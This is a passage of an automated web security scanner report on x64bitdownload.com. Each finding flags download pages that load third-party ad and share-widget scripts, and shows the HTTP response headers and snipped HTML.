...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.123. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.124. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.125. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.126. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.127. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.128. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:37 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.129. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.130. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.131. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.132. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.133. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.134. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.135. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.136. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.137. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.138. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.139. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
